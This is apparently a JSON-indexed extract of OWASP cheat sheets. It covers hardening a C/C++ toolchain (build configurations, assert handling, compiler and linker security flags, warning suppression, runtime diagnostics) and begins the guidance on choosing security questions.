## Makefile\nDEBUG_GOALS = $(filter $(MAKECMDGOALS), debug)\nifneq ($(DEBUG_GOALS),)\n    WANT_DEBUG := 1\n    WANT_TEST := 0\n    WANT_RELEASE := 0\nendif\n\u2026\n\nifeq ($(WANT_DEBUG),1)\n    ESAPI_CFLAGS += -DDEBUG=1 -UNDEBUG -g3 -ggdb -O0\n    ESAPI_CXXFLAGS += -DDEBUG=1 -UNDEBUG -g3 -ggdb -O0\nendif\n\nifeq ($(WANT_RELEASE),1)\n    ESAPI_CFLAGS += -DNDEBUG=1 -UDEBUG -g -O2\n    ESAPI_CXXFLAGS += -DNDEBUG=1 -UDEBUG -g -O2\nendif\n\nifeq ($(WANT_TEST),1)\n    ESAPI_CFLAGS += -DESAPI_NO_ASSERT=1 -g2 -ggdb -O2 -Dprivate=public\n                                                      -Dprotected=public\n    ESAPI_CXXFLAGS += -DESAPI_NO_ASSERT=1 -g2 -ggdb -O2 -Dprivate=public\n                                                        -Dprotected=public\nendif\n\u2026\n\n## Merge ESAPI flags with user supplied flags. We perform the extra step to ensure\n## user options follow our options, which should give user option's a preference.\noverride CFLAGS := $(ESAPI_CFLAGS) $(CFLAGS)\noverride CXXFLAGS := $(ESAPI_CXXFLAGS) $(CXXFLAGS)\noverride LDFLAGS := $(ESAPI_LDFLAGS) $(LDFLAGS)\n\u2026\n

Make will first build the program in a debug configuration for a session under the debugger using a rule similar to:

%.cpp:%.o:\n        $(CXX) $(CPPFLAGS) $(CXXFLAGS) -c $< -o $@\n

When you want the release build, Make will do nothing because it considers everything up to date despite the fact CFLAGS and CXXFLAGS have changed. Hence, your program will actually be in a debug configuration and risk a SIGABRT at runtime because debug instrumentation is present (recall assert calls abort() when NDEBUG is not defined). In essence, you have DoS'd yourself due to make.

In addition, many projects do not honor the user's command-line. ESAPI C++ does its best to ensure a user's flags are honored via override as shown above, but other projects do not. For example, consider a project that should be built with Position Independent Executable (PIE or ASLR) enabled and data execution prevention (DEP) enabled. Dismissing user settings combined with insecure out of the box settings (and not picking them up during auto-setup or auto-configure) means a program built with the following will likely have neither defense:

make CFLAGS=\"-fPIE\" CXXFLAGS=\"-fPIE\" LDFLAGS=\"-pie -z,noexecstack, -z,noexecheap\"\n

Defenses such as ASLR and DEP are especially important on Linux because Data Execution - not Prevention - is the norm.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#integration","title":"Integration","text":"

Project level integration presents opportunities to harden your program or library with domain specific knowledge. For example, if the platform supports Position Independent Executables (PIE or ASLR) and data execution prevention (DEP), then you should integrate with it. The consequences of not doing so could result in exploitation. As a case in point, see KingCope's 0-days for MySQL in December, 2012 (CVE-2012-5579 and CVE-2012-5612, among others). Integration with platform security would have neutered a number of the 0-days.

You also have the opportunity to include helpful libraries that are not need for business logic support. For example, if you are working on a platform with DMalloc or Address Sanitizer, you should probably use it in your debug builds. For Ubuntu, DMalloc available from the package manager and can be installed with sudo apt install libdmalloc5. For Apple platforms, its available as a scheme option. Address Sanitizer is available in GCC 4.8 and above for many platforms.

In addition, project level integration is an opportunity to harden third party libraries you chose to include. Because you chose to include them, you and your users are responsible for them. If you or your users endure a SP800-53 audit, third party libraries will be in scope because the supply chain is included (specifically, item SA-12, Supply Chain Protection). The audits are not limited to those in the US Federal arena - financial institutions perform reviews too. A perfect example of violating this guidance is CVE-2012-1525, which was due to Adobe's inclusion of a defective Sablotron library.

Another example is including OpenSSL. You know (1) SSLv2 is insecure, (2) SSLv3 is insecure, and (3) compression is insecure (among others). In addition, suppose you don't use hardware and engines, and only allow static linking. Given the knowledge and specifications, you would configure the OpenSSL library as follows:

$ Configure darwin64-x86_64-cc -no-hw -no-engine -no-comp -no-shared\n    -no-dso -no-ssl2 -no-ssl3 --openssldir=\u2026\n

Note Well: you might want engines, especially on Ivy Bridge microarchitectures (3rd generation Intel Core i5 and i7 processors). To have OpenSSL use the processor's random number generator (via the of rdrand instruction), you will need to call OpenSSL's ENGINE_load_rdrand() function and then ENGINE_set_default with ENGINE_METHOD_RAND. See OpenSSL's Random Numbers for details.

If you configure without the switches, then you will likely have vulnerable code/libraries and risk failing an audit. If the program is a remote server, then the following command will reveal if compression is active on the channel:

echo \"GET / HTTP1.0\" | openssl s_client -connect <nowiki>example.com:443</nowiki>\n

nm or openssl s_client will show that compression is enabled in the client. In fact, any symbol within the OPENSSL_NO_COMP preprocessor macro will bear witness since -no-comp is translated into a CFLAGS define.

$ nm /usr/local/ssl/iphoneos/lib/libcrypto.a 2>/dev/null | egrep -i \"(COMP_CTX_new|COMP_CTX_free)\"\n0000000000000110 T COMP_CTX_free\n0000000000000000 T COMP_CTX_new\n

Even more egregious is the answer given to auditors who specifically ask about configurations and protocols: \"we don't use weak/wounded/broken ciphers\" or \"we follow best practices.\" The use of compression tells the auditor that you are using wounded protocol in an insecure configuration and you don't follow best practices. That will likely set off alarm bells, and ensure the auditor dives deeper on more items.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#preprocessor","title":"Preprocessor","text":"

The preprocessor is crucial to setting up a project for success. The C committee provided one macro - NDEBUG - and the macro can be used to derive a number of configurations and drive engineering processes. Unfortunately, the committee also left many related items to chance, which has resulted in programmers abusing built-in facilities. This section will help you set up you projects to integrate well with other projects and ensure reliability and security.

There are three topics to discuss when hardening the preprocessor. The first is well defined configurations which produce well defined behaviors, the second is useful behavior from assert, and the third is proper use of macros when integrating vendor code and third party libraries.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#configurations","title":"Configurations","text":"

To remove ambiguity, you should recognize two configurations: Release and Debug. Release is for production code on live servers, and its behavior is requested via the C/C++ NDEBUG macro. Its also the only macro observed by the C and C++ Committees and Posix. Diametrically opposed to release is Debug. While there is a compelling argument for !defined(NDEBUG), you should have an explicit macro for the configuration and that macro should be DEBUG. This is because vendors and outside libraries use DEBUG (or similar) macro for their configuration. For example, Carnegie Mellon's Mach kernel uses DEBUG, Microsoft's CRT uses _DEBUG, and Wind River Workbench uses DEBUG_MODE.

In addition to NDEBUG (Release) and DEBUG (Debug), you have two additional cross products: both are defined or neither are defined. Defining both should be an error, and defining neither should default to a release configuration. Below is from ESAPI C++ EsapiCommon.h, which is the configuration file used by all source files:

// Only one or the other, but not both\n##if (defined(DEBUG) || defined(_DEBUG)) && (defined(NDEBUG)\n|| defined(_NDEBUG))\n## error Both DEBUG and NDEBUG are defined.\n##endif\n\n// The only time we switch to debug is when asked.\n// NDEBUG or {nothing} results\n// in release build (fewer surprises at runtime).\n##if defined(DEBUG) || defined(_DEBUG)\n## define ESAPI_BUILD_DEBUG 1\n##else\n## define ESAPI_BUILD_RELEASE 1\n##endif\n

When DEBUG is in effect, your code should receive full debug instrumentation, including the full force of assertions.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#assert","title":"ASSERT","text":"

Asserts will help you create self-debugging code by helping you find the point of first failure quickly and easily. Asserts should be used throughout your program, including parameter validation, return value checking and program state. The assert will silently guard your code through its lifetime. It will always be there, even when not debugging a specific component of a module. If you have thorough code coverage, you will spend less time debugging and more time developing because programs will debug themselves.

To use asserts effectively, you should assert everything. That includes parameters upon entering a function, return values from function calls, and any program state. Everywhere you place an if statement for validation or checking, you should have an assert. Everywhere you have an assert for validation or checking, you should have an if statement. They go hand-in-hand.

If you are still using printf's, then you have an opportunity for improvement. In the time it takes for you to write a printf or NSLog statement, you could have written an assert. Unlike the printf or NSLog which are often removed when no longer needed, the assert stays active forever. Remember, this is all about finding the point of first failure quickly so you can spend your time doing other things.

There is one problem with using asserts - Posix states assert should call abort() if NDEBUG is not defined. When debugging, NDEBUG will never be defined since you want the \"program diagnostics\" (quote from the Posix description). The behavior makes assert and its accompanying abort() completely useless for development. The result of \"program diagnostics\" calling abort() due to standard C/C++ behavior is disuse - developers simply don't use them. Its incredibly bad for the development community because self-debugging programs can help eradicate so many stability problems.

Since self-debugging programs are so powerful, you will have to have to supply your own assert and signal handler with improved behavior. Your assert will exchange auto-aborting behavior for auto-debugging behavior. The auto-debugging facility will ensure the debugger snaps when a problem is detected, and you will find the point of first failure quickly and easily.

ESAPI C++ supplies its own assert with the behavior described above. In the code below, ASSERT raises SIGTRAP when in effect or it evaluates to void in other cases.

// A debug assert which should be sprinkled liberally.\n// This assert fires and then continues rather\n// than calling abort(). Useful when examining negative\n// test cases from the command-line.\n##if (defined(ESAPI_BUILD_DEBUG) && defined(ESAPI_OS_STARNIX))\n##  define ESAPI_ASSERT1(exp) {                                    \\\n    if(!(exp)) {                                                  \\\n        std::ostringstream oss;                                     \\\n        oss << \"Assertion failed: \" << (char*)(__FILE__) << \"(\"     \\\n            << (int)__LINE__ << \"): \" << (char*)(__func__)          \\\n            << std::endl;                                           \\\n        std::cerr << oss.str();                                     \\\n        raise(SIGTRAP);                                             \\\n    }                                                             \\\n    }\n##  define ESAPI_ASSERT2(exp, msg) {                               \\\n    if(!(exp)) {                                                  \\\n        std::ostringstream oss;                                     \\\n        oss << \"Assertion failed: \" << (char*)(__FILE__) << \"(\"     \\\n            << (int)__LINE__ << \"): \" << (char*)(__func__)          \\\n            << \": \\\"\" << (msg) << \"\\\"\" << std::endl;                \\\n        std::cerr << oss.str();                                     \\\n        raise(SIGTRAP);                                             \\\n    }                                                             \\\n    }\n##elif (defined(ESAPI_BUILD_DEBUG) && defined(ESAPI_OS_WINDOWS))\n##  define ESAPI_ASSERT1(exp)      assert(exp)\n##  define ESAPI_ASSERT2(exp, msg) assert(exp)\n##else\n##  define ESAPI_ASSERT1(exp)      ((void)(exp))\n##  define ESAPI_ASSERT2(exp, msg) ((void)(exp))\n##endif\n\n##if !defined(ASSERT)\n##  define ASSERT(exp)     ESAPI_ASSERT1(exp)\n##endif\n

At program startup, a SIGTRAP handler will be installed if one is not provided by another component:

    struct DebugTrapHandler\n{\nDebugTrapHandler()\n{\nstruct sigaction new_handler, old_handler;\n\ndo\n{\nint ret = 0;\n\nret = sigaction (SIGTRAP, NULL, &old_handler);\nif (ret != 0) break; // Failed\n\n// Don't step on another's handler\nif (old_handler.sa_handler != NULL) break;\n\nnew_handler.sa_handler = &DebugTrapHandler::NullHandler;\nnew_handler.sa_flags = 0;\n\nret = sigemptyset (&new_handler.sa_mask);\nif (ret != 0) break; // Failed\n\nret = sigaction (SIGTRAP, &new_handler, NULL);\nif (ret != 0) break; // Failed\n\n} while(0);\n}\n\nstatic void NullHandler(int /*unused*/) { }\n\n};\n\n// We specify a relatively low priority, to make sure we run before other CTORs\n// http://gcc.gnu.org/onlinedocs/gcc/C_002b_002b-Attributes.html#C_002b_002b-Attributes\nstatic const DebugTrapHandler g_dummyHandler __attribute__ ((init_priority (110)));\n

On a Windows platform, you would call _set_invalid_parameter_handler (and possibly set_unexpected or set_terminate) to install a new handler.

Live hosts running production code should always define NDEBUG (i.e., release configuration), which means they do not assert or auto-abort. Auto-abortion is not acceptable behavior, and anyone who asks for the behavior is completely abusing the functionality of \"program diagnostics\". If a program wants a core dump, then it should create the dump rather than crashing.

For more reading on asserting effectively, please see one of John Robbin's books, such as Debugging Applications. John is a legendary bug slayer in Windows circles, and he will show you how to do nearly everything, from debugging a simple program to bug slaying in multithreaded programs.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#additional-macros","title":"Additional Macros","text":"

Additional macros include any macros needed to integrate properly and securely. It includes integrating the program with the platform (for example MFC or Cocoa/CocoaTouch) and libraries (for example, Crypto++ or OpenSSL). It can be a challenge because you have to have proficiency with your platform and all included libraries and frameworks. The list below illustrates the level of detail you will need when integrating.

Though Boost is missing from the list, it appears to lack recommendations, additional debug diagnostics, and a hardening guide. See BOOST Hardening Guide (Preprocessor Macros) for details. In addition, Tim Day points to [boost.build] should we not define _SECURE_SCL=0 by default for all msvc toolsets for a recent discussion related to hardening (or lack thereof).

In addition to what you should define, defining some macros and undefining others should trigger a security related defect. For example, -U_FORTIFY_SOURCES on Linux and _CRT_SECURE_NO_WARNINGS=1, _SCL_SECURE_NO_WARNINGS, _ATL_SECURE_NO_WARNINGS or STRSAFE_NO_DEPRECATE on Windows.

a) Be careful with _GLIBCXX_DEBUG when using pre-compiled libraries such as Boost from a distribution. There are ABI incompatibilities, and the result will likely be a crash. You will have to compile Boost with _GLIBCXX_DEBUG or omit _GLIBCXX_DEBUG.

b) See Chapter 5, Diagnostics of the libstdc++ manual for details.

c) SQLite secure deletion zeroizes memory on destruction. Define as required, and always define in US Federal since zeroization is required for FIPS 140-2, Level 1.

d) N is 0644 by default, which means everyone has some access.

e) Force temporary tables into memory (no unencrypted data to disk).

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#compiler-and-linker","title":"Compiler and Linker","text":"

Compiler writers provide a rich set of warnings from the analysis of code during compilation. Both GCC and Visual Studio have static analysis capabilities to help find mistakes early in the development process. The built-in static analysis capabilities of GCC and Visual Studio are usually sufficient to ensure proper API usage and catch a number of mistakes such as using an uninitialized variable or comparing a negative signed int and a positive unsigned int.

As a concrete example, (and for those not familiar with C/C++ promotion rules), a warning will be issued if a signed integer is promoted to an unsigned integer and then compared because a side effect is -1 > 1 after promotion! GCC and Visual Studio will not currently catch, for example, SQL injections and other tainted data usage. For that, you will need a tool designed to perform data flow analysis or taint analysis.

Some in the development community resist static analysis or refute its results. For example, when static analysis warned the Linux kernel's sys_prctl was comparing an unsigned value against less than zero, Jesper Juhl offered a patch to clean up the code. Linus Torvalds howled \"No, you don't do this\u2026 GCC is crap\" (referring to compiling with warnings). For the full discussion, see [PATCH] Don't compare unsigned variable for <0 in sys_prctl() from the Linux Kernel mailing list.

The following sections will detail steps for three platforms. First is a typical GNU Linux based distribution offering GCC and Binutils, second is Clang and Xcode, and third is modern Windows platforms.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#distribution-hardening","title":"Distribution Hardening","text":"

Before discussing GCC and Binutils, it would be a good time to point out some of the defenses discussed below are all ready present in a distribution. Unfortunately, its design by committee, so what is present is usually only a mild variation of what is available (this way, everyone is mildly offended). For those who are purely worried about performance, you might be surprised to learn you have already taken the small performance hint without even knowing.

Linux and BSD distributions often apply some hardening without intervention via GCC Spec Files. If you are using Debian, Ubuntu, Linux Mint and family, see Debian Hardening. For Red Hat and Fedora systems, see New hardened build support (coming) in F16. Gentoo users should visit Hardened Gentoo.

You can see the settings being used by a distribution via gcc -dumpspecs. From Linux Mint 12 below, -fstack-protector (but not -fstack-protector-all) is used by default.

$ gcc -dumpspecs\n\u2026\n*link_ssp: %{fstack-protector:}\n\n*ssp_default: %{!fno-stack-protector:%{!fstack-protector-all:\n              %{!ffreestanding:%{!nostdlib:-fstack-protector}}}}\n\u2026\n

The \"SSP\" above stands for Stack Smashing Protector. SSP is a reimplementation of Hiroaki Etoh's work on IBM Pro Police Stack Detector. See Hiroaki Etoh's patch gcc stack-smashing protector and IBM's GCC extension for protecting applications from stack-smashing attacks for details.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#gccbinutils","title":"GCC/Binutils","text":"

GCC (the compiler collection) and Binutils (the assemblers, linkers, and other tools) are separate projects that work together to produce a final executable. Both the compiler and linker offer options to help you write safer and more secure code. The linker will produce code which takes advantage of platform security features offered by the kernel and PaX, such as no-exec stacks and heaps (NX) and Position Independent Executable (PIE).

The table below offers a set of compiler options to build your program. Static analysis warnings help catch mistakes early, while the linker options harden the executable at runtime. In the table below, \"GCC\" should be loosely taken as \"non-ancient distributions.\" While the GCC team considers 4.2 ancient, you will still encounter it on Apple and BSD platforms due to changes in GPL licensing around 2007. Refer to GCC Option Summary, Options to Request or Suppress Warnings and Binutils (LD) Command Line Options for usage details.

Noteworthy of special mention are -fno-strict-overflow and -fwrapv\u2090. The flags ensure the compiler does not remove statements that result in overflow or wrap. If your program only runs correctly using the flags, it is likely violating C/C++ rules on overflow and illegal. If the program is illegal due to overflow or wrap checking, you should consider using safe-iop for C or David LeBlanc's SafeInt in C++.

For a project compiled and linked with hardened settings, some of those settings can be verified with the Checksec tool written by Tobias Klein. The checksec.sh script is designed to test standard Linux OS and PaX security features being used by an application. See the Trapkit web page for details.

GCC C Warning Options table:

a) Unlike Clang and -Weverything, GCC does not provide a switch to truly enable all warnings. b) -fstack-protector guards functions with high risk objects such as C strings, while -fstack-protector-all guards all objects.

Additional C++ warnings which can be used include the following in Table 3. See GCC's Options Controlling C++ Dialect for additional options and details.

GCC C++ Warning Options table:

Effective C++, Second Edition book.

And additional Objective C warnings which are often useful include the following. See Options Controlling Objective-C and Objective-C++ Dialects for additional options and details.

GCC Objective C Warning Options table:

The use of aggressive warnings will produce spurious noise. The noise is a tradeoff - you can learn of potential problems at the cost of wading through some chaff. The following will help reduces spurious noise from the warning system:

Finally, a simple version based Makefile example is shown below. This is different than feature based makefile produced by auto tools (which will test for a particular feature and then define a symbol or configure a template file). Not all platforms use all options and flags. To address the issue you can pursue one of two strategies. First, you can ship with a weakened posture by servicing the lowest common denominator; or you can ship with everything in force. In the latter case, those who don't have a feature available will edit the makefile to accommodate their installation.

CXX=g++\nEGREP = egrep\n\u2026\n\nGCC_COMPILER = $(shell $(CXX) -v 2>&1 | $(EGREP) -i -c '^gcc version')\nGCC41_OR_LATER = $(shell $(CXX) -v 2>&1 | $(EGREP) -i -c '^gcc version (4\\.[1-9]|[5-9])')\n\u2026\n\nGNU_LD210_OR_LATER = $(shell $(LD) -v 2>&1 | $(EGREP) -i -c '^gnu ld .* (2\\.1[0-9]|2\\.[2-9])')\nGNU_LD214_OR_LATER = $(shell $(LD) -v 2>&1 | $(EGREP) -i -c '^gnu ld .* (2\\.1[4-9]|2\\.[2-9])')\n\u2026\n\nifeq ($(GCC_COMPILER),1)\nMY_CC_FLAGS += -Wall -Wextra -Wconversion\n    MY_CC_FLAGS += -Wformat=2 -Wformat-security\n    MY_CC_FLAGS += -Wno-unused-parameter\nendif\n\nifeq ($(GCC41_OR_LATER),1)\nMY_CC_FLAGS += -fstack-protector-all\nendif\n\nifeq ($(GCC42_OR_LATER),1)\nMY_CC_FLAGS += -Wstrict-overflow\nendif\n\nifeq ($(GCC43_OR_LATER),1)\nMY_CC_FLAGS += -Wtrampolines\nendif\n\nifeq ($(GNU_LD210_OR_LATER),1)\nMY_LD_FLAGS += -z,nodlopen -z,nodump\nendif\n\nifeq ($(GNU_LD214_OR_LATER),1)\nMY_LD_FLAGS += -z,noexecstack -z,noexecheap\nendif\n\nifeq ($(GNU_LD215_OR_LATER),1)\nMY_LD_FLAGS += -z,relro -z,now\nendif\n\nifeq ($(GNU_LD216_OR_LATER),1)\nMY_CC_FLAGS += -fPIE\n    MY_LD_FLAGS += -pie\nendif\n\n## Use 'override' to honor the user's command line\noverride CFLAGS := $(MY_CC_FLAGS) $(CFLAGS)\noverride CXXFLAGS := $(MY_CC_FLAGS) $(CXXFLAGS)\noverride LDFLAGS := $(MY_LD_FLAGS) $(LDFLAGS)\n\u2026\n
"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#clangxcode","title":"Clang/Xcode","text":"

Clang and LLVM have been aggressively developed since Apple lost its GPL compiler back in 2007 (due to Tivoization which resulted in GPLv3). Since that time, a number of developers and Goggle have joined the effort. While Clang will consume most (all?) GCC/Binutil flags and switches, the project supports a number of its own options, including a static analyzer. In addition, Clang is relatively easy to build with additional diagnostics, such as Dr. John Regher and Peng Li's Integer Overflow Checker (IOC).

IOC is incredibly useful, and has found bugs in a number of projects, from the Linux Kernel (include/linux/bitops.h, still unfixed), SQLite, PHP, Firefox (many still unfixed), LLVM, and Python. Future version of Clang (Clang 3.3 and above) will allow you to enable the checks out of the box with -fsanitize=integer and -fsanitize=shift.

Clang options can be found at Clang Compiler User's Manual. Clang does include an option to turn on all warnings - -Weverything. Use it with care but use it regularly since you will get back a lot of noise and issues you missed. For example, add -Weverything for production builds and make non-spurious issues a quality gate. Under Xcode, simply add -Weverything to CFLAGS and CXXFLAGS.

In addition to compiler warnings, both static analysis and additional security checks can be performed. Reading on Clang's static analysis capabilities can be found at Clang Static Analyzer. Figure 1 below shows some of the security checks utilized by Xcode.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#visual-studio","title":"Visual Studio","text":"

Visual Studio offers a convenient Integrated Development Environment (IDE) for managing solutions and their settings. the section called \"Visual Studio Options\" discusses option which should be used with Visual Studio, and the section called \"Project Properties\" demonstrates incorporating those options into a solution's project.

The table below lists the compiler and linker switches which should be used under Visual Studio. Refer to Howard and LeBlanc's Writing Secure Code (Microsoft Press) for a detailed discussion; or Protecting Your Code with Visual C++ Defenses in Security Briefs by Michael Howard. In the table below, \"Visual Studio\" refers to nearly all versions of the development environment, including Visual Studio 5.0 and 6.0.

For a project compiled and linked with hardened settings, those settings can be verified with BinScope. BinScope is a verification tool from Microsoft that analyzes binaries to ensure that they have been built-in compliance with Microsoft's Security Development Lifecycle (SDLC) requirements and recommendations. See the BinScope Binary Analyzer download page for details.

a) See Jon Sturgeon's discussion of the switch at Off By Default Compiler Warnings in Visual C++.

a) When using /GS, there are a number of circumstances which affect the inclusion of a security cookie. For example, the guard is not used if there is no buffer in the stack frame, optimizations are disabled, or the function is declared naked or contains inline assembly.

b) #pragma strict_gs_check(on) should be used sparingly, but is recommend in high risk situations, such as when a source file parses input from the internet.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#warn-suppression","title":"Warn Suppression","text":"

From the tables above, a lot of warnings have been enabled to help detect possible programming mistakes. The potential mistakes are detected via compiler which carries around a lot of contextual information during its code analysis phase. At times, you will receive spurious warnings because the compiler is not that smart. Its understandable and even a good thing (how would you like to be out of a job because a program writes its own programs?). At times you will have to learn how to work with the compiler's warning system to suppress warnings. Notice what was not said: turn off the warnings.

Suppressing warnings placates the compiler for spurious noise so you can get to the issues that matter (you are separating the wheat from the chaff). This section will offer some hints and point out some potential minefields. First is an unused parameter (for example, argc or argv). Suppressing unused parameter warnings is especially helpful for C++ and interface programming, where parameters are often unused. For this warning, simply define an \"UNUSED\" macro and warp the parameter:

##define UNUSED_PARAMETER(x) ((void)x)\n\u2026\n\nint main(int argc, char* argv[])\n{\nUNUSED_PARAMETER(argc);\nUNUSED_PARAMETER(argv);\n\u2026\n}\n

A potential minefield lies near \"comparing unsigned and signed\" values, and -Wconversion will catch it for you. This is because C/C++ promotion rules state the signed value will be promoted to an unsigned value and then compared. That means -1 > 1 after promotion! To fix this, you cannot blindly cast - you must first range test the value:

int x = GetX();\nunsigned int y = GetY();\n\nASSERT(x >= 0);\nif(!(x >= 0))\nthrow runtime_error(\"WTF??? X is negative.\");\n\nif(static_cast<unsigned int>(x) > y)\ncout << \"x is greater than y\" << endl;\nelse\ncout << \"x is not greater than y\" << endl;\n

Notice the code above will debug itself - you don't need to set a breakpoint to see if there is a problem with x. Just run the program and wait for it to tell you there is a problem. If there is a problem, the program will snap the debugger (and more importantly, not call a useless abort() as specified by Posix). It beats the snot out of printf that are removed when no longer needed or pollute outputs.

Another conversion problem you will encounter conversion between types, and -Wconversion will also catch it for you. The following will always have an opportunity to fail, and should light up like a Christmas tree:

struct sockaddr_in addr;\n\u2026\n\naddr.sin_port = htons(atoi(argv[2]));\n

The following would probably serve you much better. Notice atoi and fiends are not used because they can silently fail. In addition, the code is instrumented so you don't need to waste a lot of time debugging potential problems:

const char* cstr = GetPortString();\n\nASSERT(cstr != NULL);\nif(!(cstr != NULL))\nthrow runtime_error(\"WTF??? Port string is not valid.\");\n\nistringstream iss(cstr);\nlong long t = 0;\niss >> t;\n\nASSERT(!(iss.fail()));\nif(iss.fail())\nthrow runtime_error(\"WTF??? Failed to read port.\");\n\n// Should this be a port above the reserved range ([0-1024] on Unix)?\nASSERT(t > 0);\nif(!(t > 0))\nthrow runtime_error(\"WTF??? Port is too small\");\n\nASSERT(t < static_cast<long long>(numeric_limits<unsigned int>::max()));\nif(!(t < static_cast<long long>(numeric_limits<unsigned int>::max())))\nthrow runtime_error(\"WTF??? Port is too large\");\n\n// OK to use port\nunsigned short port = static_cast<unsigned short>(t);\n\u2026\n

Again, notice the code above will debug itself - you don't need to set a breakpoint to see if there is a problem with port. This code will continue checking conditions, years after being instrumented (assuming to wrote code to read a config file early in the project). There's no need to remove the ASSERTs as with printf since they are silent guardians.

Another useful suppression trick is too avoid ignoring return values. Not only is it useful to suppress the warning, its required for correct code. For example, snprint will alert you to truncations through its return value. You should not make them silent truncations by ignoring the warning or casting to void:

char path[PATH_MAX];\n\u2026\n\nint ret = snprintf(path, sizeof(path), \"%s/%s\", GetDirectory(), GetObjectName());\nASSERT(ret != -1);\nASSERT(!(ret >= sizeof(path)));\n\nif(ret == -1 || ret >= sizeof(path))\nthrow runtime_error(\"WTF??? Unable to build full object name\");\n\n// OK to use path\n\u2026\n

The problem is pandemic, and not just boring user land programs. Projects which offer high integrity code, such as SELinux, suffer silent truncations. The following is from an approved SELinux patch even though a comment was made that it suffered silent truncations in its security_compute_create_name function from compute_create.c.

12  int security_compute_create_raw(security_context_t scon,\n13                                  security_context_t tcon,\n14                                  security_class_t   tclass,\n15                                  security_context_t * newcon)\n16  {\n17    char path[PATH_MAX];\n18    char *buf;\n19    size_t size;\n20    int fd, ret;\n21\n22    if (!selinux_mnt) {\n23      errno = ENOENT;\n24      return -1;\n25    }\n26\n27    snprintf(path, sizeof path, \"%s/create\", selinux_mnt);\n28    fd = open(path, O_RDWR);\n

Unlike other examples, the above code will not debug itself, and you will have to set breakpoints and trace calls to determine the point of first failure. (And the code above gambles that the truncated file does not exist or is not under an adversary's control by blindly performing the open).

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#runtime","title":"Runtime","text":"

The previous sections concentrated on setting up your project for success. This section will examine additional hints for running with increased diagnostics and defenses. Not all platforms are created equal - GNU Linux is difficult to impossible to add hardening to a program after compiling and static linking; while Windows allows post-build hardening through a download. Remember, the goal is to find the point of first failure quickly so you can improve the reliability and security of the code.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#xcode","title":"Xcode","text":"

Xcode offers additional Code Diagnostics that can help find memory errors and object use problems. Schemes can be managed through Products menu item, Scheme submenu item, and then Edit. From the editor, navigate to the Diagnostics tab. In the figure below, four additional instruments are enabled for the debugging cycle: Scribble guards, Edge guards, Malloc guards, and Zombies.

There is one caveat with using some of the guards: Apple only provides them for the simulator, and not a device. In the past, the guards were available for both devices and simulators.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#windows","title":"Windows","text":"

Visual Studio offers a number of debugging aides for use during development. The aides are called Managed Debugging Assistants (MDAs). You can find the MDAs on the Debug menu, then Exceptions submenu. MDAs allow you to tune your debugging experience by, for example, filter exceptions for which the debugger should snap. For more details, see Stephen Toub's Let The CLR Find Bugs For You With Managed Debugging Assistants.

Finally, for runtime hardening, Microsoft has a helpful tool called EMET. EMET is the Enhanced Mitigation Experience Toolkit, and allows you to apply runtime hardening to an executable which was built without. Its very useful for utilities and other programs that were built without an SDLC.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html","title":"Choosing and Using Security Questions Cheat Sheet","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#introduction","title":"Introduction","text":"

WARNING: Security questions are no longer recognized as an acceptable authentication factor per NIST SP 800-63. Account recovery is just an alternate way to authenticate so it should be no weaker than regular authentication. See SP 800-63B sec 5.1.1.2 paragraph 4: Verifiers SHALL NOT prompt subscribers to use specific types of information (e.g., \u201cWhat was the name of your first pet?\u201d) when choosing memorized secrets.

If you are curious, please have a look at this study by Microsoft Research in 2009 and this study performed at Google in 2015. The accompanying Security blog update includes an infographic on the issues identified with security questions.

Please Note: While there are no acceptable uses of security questions in secure software, this cheat sheet provides guidance on how to choose strong security questions for legacy purposes.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#choosing-security-questions","title":"Choosing Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#desired-characteristics","title":"Desired Characteristics","text":"

Any security questions presented to users to reset forgotten passwords must meet the following characteristics:

Characteristic Explanation Memorable The user must be able to recall the answer to the question, potentially years after creating their account. Consistent The answer to the question must not change over time. Applicable The user must be able to answer the question. Confidential The answer to the question must be hard for an attacker to obtain. Specific The answer should be clear to the user."},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#types-of-security-questions","title":"Types of Security Questions","text":"

Security questions fall into two main types. With user defined security questions, the user must choose a question from a list, and provide an answer to the question. Common examples are \"What is your favourite colour?\" or \"What was your first car?\"

These are easy for applications to implement, as the additional information required is provided by the user when they first create their account. However, users will often choose weak or easily discovered answers to these questions.

System defined security questions are based on information that is already known about the user. This approach avoids having to ask the user to provide specific security questions and answers, and also prevents them from being able to choose weak details. However it relies on sufficient information already being stored about the user, and on this information being hard for an attacker to obtain.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#user-defined-security-questions","title":"User Defined Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#bad-questions","title":"Bad Questions","text":"

Any questions that do not have all of the characteristics discussed above should be avoided. The table below gives some examples of bad security questions:

Question Problem When is your date of birth? Easy for an attacker to discover. What is your memorable date? Most users will just enter their birthday. What is your favourite movie? Likely to change over time. What is your favourite cricket team? Not applicable to most users. What is the make and model of your first car? Fairly small range of likely answers.

